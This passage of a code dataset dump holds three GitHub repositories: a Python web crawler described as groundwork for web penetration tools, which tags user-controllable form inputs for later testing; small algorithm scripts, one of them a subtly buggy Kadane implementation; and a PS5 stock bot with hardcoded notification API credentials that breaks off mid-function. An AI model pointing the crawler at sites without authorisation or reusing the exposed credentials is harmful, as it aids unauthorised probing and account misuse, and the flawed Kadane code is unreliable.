crawler.crawl(c)" }, { "alpha_fraction": 0.5786993503570557, "alphanum_fraction": 0.5881243944168091, 
"avg_line_length": 37.17266082763672, "blob_id": "0f852040d0ed30918f82f7cab883c109cc4a566a", "content_id": "5346422a92ec55b8e692838279b322ac1bdabc99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5577, "license_type": "no_license", "max_line_length": 128, "num_lines": 139, "path": "/url_collection.py", "repo_name": "teuthemonsoon/url_collection", "src_encoding": "GB18030", "text": "# encoding=utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport re,urlparse,os\nimport sys\n\nINPUT_SIGN=\"{{__INPUT__}}\"\nheaders={\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\":\"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\",\n \"Accept-Encoding\":\"\"}\nREWRITE_TYPE=[\"normal\",\"path\"]\n\nclass crawler:\n def __init__(self,url,deepest=5): #采用基于广度的搜索算法,默认规定深度最大值为5\n self.host=url\n self.url_rewrite_type=self.url_rewrite_type()\n self.list_opt=list_opt()\n self.deepest=deepest\n self.list_opt.add_url_to_unvisited(url)\n self.url_count_at_one_depth = 1\n self.depth=1\n\n def url_rewrite_type(self):\n return REWRITE_TYPE[0] #todo:判断urlrewrite模式\n # 当前默认为普通模式\n\n def crawl(self):\n while self.depth<=self.deepest and self.list_opt.count_unvisited() > 0:\n# print self.list_opt.get_unvisted()\n html=self.request(self.list_opt.unvisited[0])\n urllist=self.graburl(html)\n for url in urllist:\n if (not self.exists_or_similar(url)):\n self.list_opt.unvisited.append(url)\n if self.url_count_at_one_depth==0:\n self.depth+=1\n self.url_count_at_one_depth+=len(urllist)\n return self.list_opt.get_visited()\n\n def request(self,url):\n req=requests.session()\n print \"requesting to \"+url\n try:\n html=req.get(url,headers=headers).content\n except: Exception\n query_string=urlparse.urlparse(url).query\n# query_args={[(k,v[0]) for k,v in urlparse.parse_qs(query_string).items()]} #得到所有的query值然后转为dict\n self.url_count_at_one_depth-=1\n self.list_opt.unvisited.remove(url)\n self.list_opt.visited.append(url)\n# self.list_opt.visited_url_args_map.append({url:query_args})\n self.list_opt.current_url=url\n return html\n\n def graburl(self,html):\n urllist = []\n soup=BeautifulSoup(html,\"lxml\")\n adomlist = soup.findAll(\"a\", {\"href\": re.compile(\".*\")})\n formdomlist=soup.findAll(\"form\",{\"action\":re.compile(\".*\")})\n for form in formdomlist:\n if (not form.attrs.has_key(\"method\")) or form.attrs[\"method\"].lower()==\"get\":#只取method为get的表单\n inputlist=form.select(\"input\")\n formGeneratedUrl=self.parse_form_path(form.attrs[\"action\"])+\"?\"\n for singleinput in inputlist:\n if singleinput.attrs.has_key(\"name\"):\n if singleinput.attrs.has_key(\"value\"):\n if singleinput.attrs.has_key(\"type\") and singleinput.attrs[\"type\"].lower()==\"hidden\":\n formGeneratedUrl+= singleinput.attrs[\"name\"]+\"=\"+singleinput.attrs[\"value\"]+\"&\"\n else:\n formGeneratedUrl += singleinput.attrs[\"name\"]+\"=\"+INPUT_SIGN+\"&\" #将给正常访问用户可控的input字段标上INPUT_SIGN\n formGeneratedUrl=formGeneratedUrl[:-1]\n else:\n formGeneratedUrl=self.parse_form_path(form.attrs[\"action\"])\n urllist.append(formGeneratedUrl)\n\n for i in adomlist:\n url = self.evaluate_and_parse_url(i.attrs[\"href\"])\n if url:\n urllist.append(url)\n return urllist\n\n def exists_or_similar(self,url):\n #判断url是否已经在已访问列表或未访问列表存在\n if url in self.list_opt.get_unvisted() or url in self.list_opt.get_visited():\n return True\n\t\t#todo: 
判断url是否与先前的相似\n\t\t\t\n def evaluate_and_parse_url(self,url):\n if url.startswith(self.host):\n return url\n elif not re.match(r\"^(\\S+):\", url):#排除伪协议以及host之外的网站\n return urlparse.urljoin(self.host,url)\n else :return False\n\n def parse_form_path(self,formaction):\n #以//为开头的form action值 表示http/https\n if formaction.startswith(\"//\"):\n schema=urlparse.urlparse(self.host)[0]\n url=schema+\":\"+formaction\n if url.startswith(self.host):\n return url\n #以/为起始的form action值 表示在网站根目录\n elif formaction.startswith(\"/\"):\n return self.host+formaction\n #判断类似index.php的form action值\n else:\n parselist=urlparse.urlparse(self.list_opt.get_current_url())\n parsed_path=parselist.path\n if parselist.path.endswith(\"/\"):\n parsed_path=parselist.path[:-1]\n path=os.path.split(parselist.path)[0]\n return self.host+urlparse.urljoin(path,formaction)\n\nclass list_opt:\n def __init__(self):\n self.visited = []\n self.unvisited = []\n self.current_url=\"\"\n self.visited_url_args_map = {}\n\n def add_url_to_unvisited(self,url):\n self.unvisited.append(url)\n def add_url_to_visited(self,url):\n self.visited.append(url)\n def get_unvisted(self):\n return self.unvisited\n def count_unvisited(self):\n return len(self.unvisited)\n def get_visited(self):\n return self.visited\n def get_current_url(self):\n return self.current_url\n\n\nif __name__ ==\"__main__\":\n host=sys.argv[1]\n c=crawler(host)\n print crawler.crawl(c)" }, { "alpha_fraction": 0.7447698712348938, "alphanum_fraction": 0.7489539980888367, "avg_line_length": 16.071428298950195, "blob_id": "a1009b7490614110d66b3f17ea32fe6bc39fad8f", "content_id": "a5704ef1938986e20b00add46cde6e8b0491b9e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 397, "license_type": "no_license", "max_line_length": 46, "num_lines": 14, "path": "/README.md", "repo_name": "teuthemonsoon/url_collection", "src_encoding": "UTF-8", "text": "# url_collection\n编写web渗透工具的基石<br>\n<br>\n使用`基于广度`的搜索算法爬取url,默认最大深度为`5`<br>\n可从\n`<a href=${url}>`\n及从form表单中提取url并自动拼接参数<br>\n## 用法\npython url_collection.py http://www.tenteu.com\n\n## todo\n将增加对url相似度的识别<br>\n将增加在js中提取url<br>\n将增加对本域名及其子域的url搜集<br>\n" } ]
3
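The url_collection.py file in the record above leaves its URL-similarity check as a TODO, while the sanitized variant implements one: two URLs are treated as similar when they share a path and query-parameter names and at least five distinct values have already been recorded for some parameter. A compact Python 3 sketch of that heuristic (the repository code is Python 2); the function and variable names here are illustrative, not the repository's:

```python
from urllib.parse import urlparse, parse_qs

def is_similar(url, seen_args_by_path, value_cap=5):
    """Return True when `url` only varies known parameter values of an
    already-crawled path (same path, same parameter names, and at least
    `value_cap` distinct values recorded for some shared parameter)."""
    parsed = urlparse(url)
    args = {k: v[0] for k, v in parse_qs(parsed.query).items()}
    if not args:
        return False
    same_keys = [s for s in seen_args_by_path.get(parsed.path, [])
                 if set(s) == set(args)]
    if not same_keys:
        return False
    return any(len({s[k] for s in same_keys}) >= value_cap for k in args)

# Example: five values of `id` were already seen for /item.php,
# so a sixth is considered "similar" and can be skipped.
seen = {"/item.php": [{"id": str(i)} for i in range(5)]}
print(is_similar("http://example.com/item.php?id=99", seen))   # True
```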
Anmol2929/Awesome-Python-Script
https://github.com/Anmol2929/Awesome-Python-Script
be880c09d599a66250b2269f5d0da5b13ee3b9a3
8831a6b51a48dbcee6dcb0141c4b3b01bac3940d
2de9b4d08ce8e58f431e9b224f1d80a6d4940ca1
refs/heads/main
2023-08-17T20:27:29.738457
2021-10-02T16:53:50
2021-10-02T16:53:50
412,579,464
0
3
MIT
2021-10-01T18:34:01
2021-10-01T19:27:54
2021-10-02T16:53:50
Python
[ { "alpha_fraction": 0.5891719460487366, "alphanum_fraction": 0.6226114630699158, "avg_line_length": 26.636363983154297, "blob_id": "48b5a1fd4cd109649d564488edefbb73ab831ab1", "content_id": "fae028da29cd502410ea2f95f2f86eccf7e5845f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 628, "license_type": "permissive", "max_line_length": 83, "num_lines": 22, "path": "/Kadanes_algo.py", "repo_name": "Anmol2929/Awesome-Python-Script", "src_encoding": "UTF-8", "text": "# Main Function to find Maximum Subarray Sum\r\n\r\ndef maxSubArraySum(a):\r\n \r\n max_now = 0\r\n total_max = -9999999999 # Initializing variables with 0 and Negative Infinity\r\n\r\n # Traversing in List/Array\r\n\r\n for i in range(0,len(a)):\r\n # Finding out Current Maximum Sum in List/Array\r\n total_max = max(a[i],total_max+a[i]) \r\n # Comparing the Current Maximum Sum with Previous One\r\n max_now = max(max_now,total_max)\r\n\r\n # This will return Maximum Subarray Sum\r\n return max_now \r\n\r\n\r\n# Driver Code\r\na = [-2, -3, 4, -1, -2, 1, 5, -3] \r\nprint(\"Maxium Subarray sum is\",maxSubArraySum(a))" }, { "alpha_fraction": 0.34934496879577637, "alphanum_fraction": 0.4104803502559662, "avg_line_length": 15.666666984558105, "blob_id": "718c0cbb20a7c6c27a500cf544939057229b1eaa", "content_id": "ae7895fc5bd028fd710ad8b89d7092d209290c2f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 687, "license_type": "permissive", "max_line_length": 44, "num_lines": 39, "path": "/Radix_sort.py", "repo_name": "Anmol2929/Awesome-Python-Script", "src_encoding": "UTF-8", "text": "def counting_sort(A, Exp):\r\n n = len(A)\r\n\r\n count = [0] * (10)\r\n\r\n for i in range(0, n):\r\n index = A[i] // Exp\r\n count[index % 10] += 1\r\n\r\n\r\n for i in range(1, 10):\r\n count[i] = count[i]+count[i - 1]\r\n\r\n output = [0] * (n)\r\n\r\n i = n - 1\r\n while i >= 0:\r\n index = A[i] // Exp\r\n output[count[index % 10] - 1] = A[i]\r\n count[index % 10] -= 1\r\n i = i- 1\r\n\r\n i = 0\r\n for i in range(0, len(A)):\r\n A[i] = output[i]\r\n\r\n\r\ndef radix_sort(A):\r\n\r\n Max = max(A)\r\n\r\n Exp = 1\r\n while Max / Exp > 0:\r\n counting_sort(A, Exp)\r\n Exp *= 10\r\n\r\nA = [130, 12, 85, 102, 25, 20, 2]\r\nradix_sort(A)\r\nprint(A)" }, { "alpha_fraction": 0.3543599247932434, "alphanum_fraction": 0.3970315456390381, "avg_line_length": 21.478260040283203, "blob_id": "c716b6715ddc986d6ee392ff30366797a7eb9935", "content_id": "c831c7a7fac4d152ea61da5a010c36bc6e5003d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1078, "license_type": "permissive", "max_line_length": 56, "num_lines": 46, "path": "/Longest_common_subsequence.py", "repo_name": "Anmol2929/Awesome-Python-Script", "src_encoding": "UTF-8", "text": "# Python program for Finding Longest Common Subsequence\r\n\r\n# Function to find lcs_algo\r\ndef lcs_algo(S1, S2, m, n):\r\n L = [[0 for x in range(n+1)] for x in range(m+1)]\r\n\r\n # Building the mtrix in bottom-up way\r\n for i in range(m+1):\r\n for j in range(n+1):\r\n if i == 0 or j == 0:\r\n L[i][j] = 0\r\n elif S1[i-1] == S2[j-1]:\r\n L[i][j] = L[i-1][j-1] + 1\r\n else:\r\n L[i][j] = max(L[i-1][j], L[i][j-1])\r\n\r\n index = L[m][n]\r\n\r\n lcs_algo = [\"\"] * (index+1)\r\n lcs_algo[index] = \"\"\r\n\r\n i = m\r\n j = n\r\n while i > 0 and j > 0:\r\n\r\n if S1[i-1] == S2[j-1]:\r\n lcs_algo[index-1] = S1[i-1]\r\n i -= 1\r\n j -= 1\r\n index 
-= 1\r\n\r\n elif L[i-1][j] > L[i][j-1]:\r\n i -= 1\r\n else:\r\n j -= 1\r\n \r\n # Printing the sub sequences\r\n print(\"S1 : \" + S1 + \"\\nS2 : \" + S2)\r\n print(\"LCS: \" + \"\".join(lcs_algo))\r\n\r\n\r\nS1 = \"ABCDEFGH\"\r\nS2 = \"ABZCDXEFYGH\"\r\nm = len(S1)\r\nn = len(S2)\r\nlcs_algo(S1, S2, m, n)" }, { "alpha_fraction": 0.8260869383811951, "alphanum_fraction": 0.8260869383811951, "avg_line_length": 23, "blob_id": "9947acca3c7ea0b5a907acb021fbc754c9b4e91d", "content_id": "4f22fdd4ca2bb0e01ec75951711ba292f188f060", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23, "license_type": "permissive", "max_line_length": 23, "num_lines": 1, "path": "/README.md", "repo_name": "Anmol2929/Awesome-Python-Script", "src_encoding": "UTF-8", "text": "# Awesome-Python-Script" } ]
4
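One note on the Kadanes_algo.py file in the record above: because the running best is initialised to 0, it reports 0 for an array whose elements are all negative instead of the largest single element. A short illustrative variant that covers that case:

```python
def max_subarray_sum(a):
    """Kadane's algorithm; also correct when every element is negative."""
    best = current = a[0]
    for x in a[1:]:
        current = max(x, current + x)   # extend the current run, or restart at x
        best = max(best, current)
    return best

assert max_subarray_sum([-2, -3, 4, -1, -2, 1, 5, -3]) == 7
assert max_subarray_sum([-5, -2, -9]) == -2   # the 0-initialised version returns 0 here
```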
DomStan/ps5-bot
https://github.com/DomStan/ps5-bot
8d717f1b497c921b56a5474a696e387838970bb0
cb250d260e71cf2ef9cd100e06cd4e9038e8fe7e
03b4d20bf8a6a9de0a4c6c70fe86993041d1cc46
refs/heads/main
2023-06-15T07:36:14.377454
2023-06-11T09:07:01
2023-06-11T09:07:01
355,663,367
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7489177584648132, "alphanum_fraction": 0.7705627679824829, "avg_line_length": 24.66666603088379, "blob_id": "8ea90be4c7f20662ed6f569979020aeb1dac55b1", "content_id": "367d43dc2790207b09be48427c6b871a3099e1b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 231, "license_type": "no_license", "max_line_length": 43, "num_lines": 9, "path": "/README.md", "repo_name": "DomStan/ps5-bot", "src_encoding": "UTF-8", "text": "# ps5-bot\nBot that checks online shops for PS5 stock.\n\n# Prerequisites (Ubuntu/Debian):\n- sudo apt install firefox\n- sudo apt install xvfb\n- sudo apt install python3-pip\n- sudo pip3 install selenium\n- sudo pip3 install xvfbwrapper\n" }, { "alpha_fraction": 0.7868852615356445, "alphanum_fraction": 0.8032786846160889, "avg_line_length": 14.25, "blob_id": "e0e08b7c4b1ba898839d9f8b637c5b0fc4c36e64", "content_id": "07d074afc8923f7519a1ae9a94712c3f26207a05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 61, "license_type": "no_license", "max_line_length": 15, "num_lines": 4, "path": "/stop-ps5.sh", "repo_name": "DomStan/ps5-bot", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\nkillall python3\nkillall firefox\nkillall Xvfb\n" }, { "alpha_fraction": 0.6750661134719849, "alphanum_fraction": 0.6827694773674011, "avg_line_length": 36.02577209472656, "blob_id": "2c9dbb46ac10da16f853c304894e6eccb6481fd7", "content_id": "5f2c1568e5a16e2925e7ba43f26be7bba9d2bccb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21551, "license_type": "no_license", "max_line_length": 155, "num_lines": 582, "path": "/ps5.py", "repo_name": "DomStan/ps5-bot", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nimport random\nfrom datetime import date\nimport logging\nimport sys\nimport os\nimport atexit\nimport requests\nimport json\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import InvalidSessionIdException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom xvfbwrapper import Xvfb\n\n# Start virtual display\nVDISPLAY = Xvfb()\nVDISPLAY.start()\n\n# Run firefox in headless mode\nOPTIONS = Options()\nOPTIONS.add_argument(\"--headless\")\n# Do not wait for page to fully load\nOPTIONS.page_load_strategy = 'none'\n\n# Makes pages load faster\nPROFILE = webdriver.FirefoxProfile()\nPROFILE.set_preference(\"browser.privatebrowsing.autostart\", True)\nPROFILE.set_preference(\"network.http.pipelining\", True)\nPROFILE.set_preference(\"network.http.proxy.pipelining\", True)\nPROFILE.set_preference(\"network.http.pipelining.maxrequests\", 8)\nPROFILE.set_preference(\"content.notify.interval\", 500000)\nPROFILE.set_preference(\"content.notify.ontimer\", True)\nPROFILE.set_preference(\"content.switch.threshold\", 250000)\nPROFILE.set_preference(\"browser.cache.memory.capacity\", 65536)\nPROFILE.set_preference(\"browser.startup.homepage\", \"about:blank\")\nPROFILE.set_preference(\"reader.parse-on-load.enabled\", False)\nPROFILE.set_preference(\"browser.pocket.enabled\", False)\nPROFILE.set_preference(\"loop.enabled\", False)\nPROFILE.set_preference(\"browser.chrome.toolbar_style\", 
1)\nPROFILE.set_preference(\"browser.display.show_image_placeholders\", False)\nPROFILE.set_preference(\"browser.display.use_document_colors\", False)\nPROFILE.set_preference(\"browser.display.use_document_fonts\", 0)\nPROFILE.set_preference(\"browser.formfill.enable\", False)\nPROFILE.set_preference(\"browser.helperApps.deleteTempFileOnExit\", True)\nPROFILE.set_preference(\"browser.shell.checkDefaultBrowser\", False)\nPROFILE.set_preference(\"browser.startup.homepage\", \"about:blank\")\nPROFILE.set_preference(\"browser.startup.page\", 0)\nPROFILE.set_preference(\"browser.tabs.forceHide\", True)\nPROFILE.set_preference(\"browser.urlbar.autoFill\", False)\nPROFILE.set_preference(\"browser.urlbar.autocomplete.enabled\", False)\nPROFILE.set_preference(\"browser.urlbar.showPopup\", False)\nPROFILE.set_preference(\"browser.urlbar.showSearch\", False)\nPROFILE.set_preference(\"extensions.checkCompatibility\", False)\nPROFILE.set_preference(\"extensions.checkUpdateSecurity\", False)\nPROFILE.set_preference(\"extensions.update.autoUpdateEnabled\", False)\nPROFILE.set_preference(\"extensions.update.enabled\", False)\nPROFILE.set_preference(\"general.startup.browser\", False)\nPROFILE.set_preference(\"plugin.default_plugin_disabled\", False)\nPROFILE.set_preference(\"permissions.default.image\", 2)\nPROFILE.set_preference(\"http.response.timeout\", 5)\nPROFILE.set_preference(\"dom.max_script_run_time\", 5)\n\nPROFILE.set_preference(\"privacy.socialtracking.block_cookies.enabled\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.annotate_channels\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.cryptomining.enabled\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.enabled\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.fingerprinting.enabled\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.pbmode.enabled\", True)\nPROFILE.set_preference(\"services.sync.prefs.sync.privacy.trackingprotection.cryptomining.enabled\", True)\nPROFILE.set_preference(\"services.sync.prefs.sync.privacy.trackingprotection.enabled\", True)\nPROFILE.set_preference(\"services.sync.prefs.sync.privacy.trackingprotection.fingerprinting.enabled\", True)\nPROFILE.set_preference(\"services.sync.prefs.sync.privacy.trackingprotection.pbmode.enabled\", True)\nPROFILE.set_preference(\"privacy.clearOnShutdown.cache\", True)\nPROFILE.set_preference(\"privacy.clearOnShutdown.cookies\", True)\nPROFILE.set_preference(\"privacy.clearOnShutdown.sessions\", True)\nPROFILE.set_preference(\"privacy.donottrackheader.enabled\", True)\nPROFILE.set_preference(\"dom.moduleScripts.enabled\", False)\nPROFILE.set_preference(\"javascript.enabled\", False)\n\n\nglobal DRIVER\nDRIVER = webdriver.Firefox(firefox_profile=PROFILE, firefox_binary='/usr/bin/firefox', executable_path='./geckodriver', options=OPTIONS)\n\n# Logging setup\nlogging.basicConfig(filename='logs/' + str(date.today()), format='%(asctime)s %(levelname)s: %(message)s', datefmt='%d/%m/%Y %H:%M:%S', level=logging.INFO)\n\n# Send notification to device(s)\ndef notify(title, message, url=None):\n token = 'a6j96sdv4z8j3jifiofo2for72fr6b'\n user = 'ucseovragtfce3ibsnocdxx64x3bx4'\n data = {'token':token, 'user':user, 'message':message, 'device':'iphone', 'title':title, 'priority':'1'}\n if url is not None:\n data['url'] = url\n r = requests.post(\"https://api.pushover.net/1/messages.json\", data=data)\n\n if int(r.status_code) == 200:\n logging.info('Notification posted.')\n else:\n logging.error('Notification post failed with status: 
' + r.status_code + ' ' + r.reason)\n\n# Exit handler with cleanup\ndef exit_handler():\n exit_message = \"Application exiting...\"\n logging.info(exit_message)\n notify(exit_message, 'Bye!')\n DRIVER.quit()\n VDISPLAY.stop()\n sys.exit()\n\natexit.register(exit_handler)\n\n# App configuration manager\nclass ConfigManager:\n CONFIG_FNAME = 'config.json'\n CONFIG_VAL_TEST_ENABLED = 'Test enabled'\n CONFIG_VAL_VERBOSE = 'Verbose'\n CONFIG_VAL_PAGE_LOAD_TIMEOUT = 'Page load timeout'\n CONFIG_VAL_COOLDOWN = 'Cooldown time'\n CONFIG_VAL_IMPLICIT_WAIT = 'Implicit wait'\n CONFIG_VAL_EXPLICIT_WAIT = 'Explicit wait'\n CONFIG_VAL_NOTIFICATION_INTERVAL = 'Notification interval'\n CONFIG_VAL_NOTIFICATION_LIMIT = 'Notification limit'\n CONFIG_VAL_NOTIFICATION_TOKEN = 'Notification token'\n CONFIG_VAL_NOTIFICATION_USERID = 'Notification userid'\n CONFIG_VAL_NOTIFICATION_DEVICE = 'Notification device'\n\n def __init__(self):\n self.update_config()\n\n def update_config(self):\n self.config = json.load(open(self.CONFIG_FNAME))\n\n def get_notification_interval(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_INTERVAL]\n\n def get_notification_limit(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_LIMIT]\n\n def get_notification_device(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_DEVICE]\n\n def get_notification_token(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_TOKEN]\n\n def get_notification_userid(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_USERID]\n\n def get_page_load_timeout(self):\n return self.config[self.CONFIG_VAL_PAGE_LOAD_TIMEOUT]\n\n def get_cooldown(self):\n return self.config[self.CONFIG_VAL_COOLDOWN]\n\n def get_implicit_wait(self):\n return self.config[self.CONFIG_VAL_IMPLICIT_WAIT]\n\n def get_explicit_wait(self):\n return self.config[self.CONFIG_VAL_EXPLICIT_WAIT]\n\n def test_enabled(self):\n return self.config[self.CONFIG_VAL_TEST_ENABLED]\n\n def verbose(self):\n return self.config[self.CONFIG_VAL_VERBOSE]\n\n def page_enabled(self, page_ID):\n try:\n return self.config[page_ID]\n except KeyError:\n return False\n\n# Status of recent notifications\nclass NotificationStatus:\n def __init__(self):\n self.last_notification_sent = 0.0\n self.recent_notifications = 0\n self.page_healthy = True\n\n def notification_sent(self):\n self.last_notification_sent = time.time()\n self.recent_notifications += 1\n\n def is_limited(self, interval, limit):\n now = time.time()\n if (now - self.last_notification_sent) >= interval:\n self.recent_notifications = 0\n\n if self.recent_notifications >= limit:\n return True\n else:\n return False\n\n def is_healthy(self):\n return self.page_healthy\n\n def unhealthy(self):\n self.page_healthy = False\n\n# Used to track and limit the number of notifications sent for each page\nclass NotificationLimiter:\n def __init__(self, pages):\n self.notification_interval = 600\n self.notification_limit = 1\n self.page_notifications = {}\n for page in pages:\n self.page_notifications[page.ID] = NotificationStatus()\n\n def get_notification_status(self, ID):\n return self.page_notifications[ID]\n\n def update_limits(self, interval, limit):\n self.notification_interval = interval\n self.notification_limit = limit\n\n# Simple page\nclass Page:\n def __init__(self, edition, name, url, stock_xpath, price_xpath, cart_xpath=None, test=False):\n # Console edition\n self.edition = edition\n # Page name\n self.name = name\n # Unique ID\n self.ID = \" \".join([name, edition])\n # Page url\n self.url = url\n # Xpath to element that 
describes stock\n self.stock_xpath = stock_xpath\n # Xpath to element that describes price\n self.price_xpath = price_xpath\n # Xpath to \"add to cart\" button\n self.cart_xpath = cart_xpath\n # Whether page used for testing\n self.test = test\n\n# Amazon page\nclass AmazonPage(Page):\n def __init__(self, edition, name, url, stock_xpath, price_xpath, sed_button_xpath=None, ded_button_xpath=None, cart_xpath=None, test=False):\n super().__init__(edition, name, url, stock_xpath, price_xpath, cart_xpath=cart_xpath, test=test)\n # Button to select standard ps5 edition\n self.sed_button_xpath = sed_button_xpath\n # Button to select digital ps5 edition\n self.ded_button_xpath = ded_button_xpath\n\n# Page names\nPAGE_AMAZONNL = 'Amazon.nl'\nPAGE_AMAZONDE = 'Amazon.de'\nPAGE_AMAZONIT = 'Amazon.it'\nPAGE_AMAZONES = 'Amazon.es'\nPAGE_AMAZONFR = 'Amazon.fr'\nPAGE_AMAZONPL = 'Amazon.pl'\nPAGE_AMAZONUK = 'Amazon.co.uk'\nPAGE_TOPO = 'Topocentras.lt'\nPAGE_TECHNO = 'Technorama.lt'\nPAGE_GAMEROOM = 'Gameroom.lt'\n\npages = []\n\npages.append(Page(\n\"Digital\",\nPAGE_TOPO,\n\"https://www.topocentras.lt/zaidimu-kompiuteris-sony-playstation-5-digital.html\",\n\"//*[@id='productPage']/div/div/article/div[2]/div[2]/div/h1\",\n\"//*[@id='productPage']/div[2]/div/article/div[2]/div[2]/div[2]/div[1]/div[2]/div[1]/span\",))\n\npages.append(Page(\n\"Digital\",\nPAGE_TOPO,\n\"https://www.topocentras.lt/zaidimu-pultas-sony-dualsense-ps5.html\",\n\"//*[@id='productPage']/div[2]/div[2]/div[1]/h1\",\n\"//*[@id='productPage']/div[2]/div/article/div[2]/div[2]/div[2]/div[1]/div[2]/div[1]/span\",\ntest=True))\n\npages.append(Page(\n\"Standard\",\nPAGE_TOPO,\n\"https://www.topocentras.lt/zaidimu-kompiuteris-sony-playstation-5.html\",\n\"//*[@id='productPage']/div/div/article/div[2]/div[2]/div/h1\",\n\"//*[@id='productPage']/div[2]/div/article/div[2]/div[2]/div[2]/div[1]/div[2]/div[1]/span\",))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONUK,\n\"https://www.amazon.co.uk/PlayStation-5-Digital-Edition-Console/dp/B08H97NYGP\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONDE,\n\"https://www.amazon.de/dp/B08H98GVK8\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Standard\",\nPAGE_AMAZONDE,\n\"https://www.amazon.de/dp/B08H93ZRK9\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONPL,\n\"https://www.amazon.pl/Sony-PlayStation-5-Digital-Edition/dp/B08H98GVK8\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Standard\",\nPAGE_AMAZONIT,\n\"https://www.amazon.it/Playstation-Sony-PlayStation-5/dp/B08KKJ37F7\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONIT,\n\"https://www.amazon.it/_itm/dp/B08KJF2D25\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONIT,\n\"https://www.amazon.it/Sony-PlayStation%C2%AE5-DualSenseTM-Wireless-Controller/dp/B08H99BPJN\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\",\ntest=True))\n\npages.append(AmazonPage(\n\"Standard\",\nPAGE_AMAZONES,\n\"https://www.amazon.es/dp/B08KKJ37F7\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONES,\n\"https://www.amazon.es/dp/B08KJF2D25\
",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Standard\",\nPAGE_AMAZONFR,\n\"https://www.amazon.fr/PlayStation-%C3%89dition-Standard-DualSense-Couleur/dp/B08H93ZRK9\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONFR,\n\"https://www.amazon.fr/PlayStation-Digital-Manette-DualSense-Couleur/dp/B08H98GVK8\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\n# pages.append(AmazonPage(\n# PAGE_AMAZONNL,\n# \"https://www.amazon.nl/-/en/dp/B08H93ZRK9\",\n# \"//*[@id='availability']/span\",\n# \"//*[@id='priceblock_ourprice']\",\n# \"//*[@id='a-autoid-13-announce']\",\n# \"//*[@id='a-autoid-14-announce']\"))\n\nOUTOFSTOCK = []\nOUTOFSTOCK.append('Obecnie niedostępny')\nOUTOFSTOCK.append('Non disponibile')\nOUTOFSTOCK.append('No disponible')\nOUTOFSTOCK.append('indisponible')\nOUTOFSTOCK.append('de ces vendeurs')\nOUTOFSTOCK.append('nicht verfügbar')\nOUTOFSTOCK.append('unavailable')\n\nNOTIFICATION_LIMITER = NotificationLimiter(pages)\nCONFIG_MANAGER = ConfigManager()\n\nDRIVER.set_page_load_timeout(CONFIG_MANAGER.get_page_load_timeout())\nDRIVER.implicitly_wait(CONFIG_MANAGER.get_implicit_wait())\n\ndef randinrange(range):\n return range[0] + (range[1]-range[0])*random.random()\n\ndef get_page_notification_status(page_id):\n try:\n return NOTIFICATION_LIMITER.get_notification_status(page_id)\n except KeyError:\n logging.error(\"Notification status could not be found for page: \" + page_id)\n return None\n\ndef ps5_detected(page, reason, price):\n notification_status = None\n can_send_notification = False\n limit_reached = False\n\n notification_status = get_page_notification_status(page.ID)\n\n if notification_status is not None:\n notification_interval = NOTIFICATION_LIMITER.notification_interval\n notification_limit = NOTIFICATION_LIMITER.notification_limit\n if not notification_status.is_limited(notification_interval, 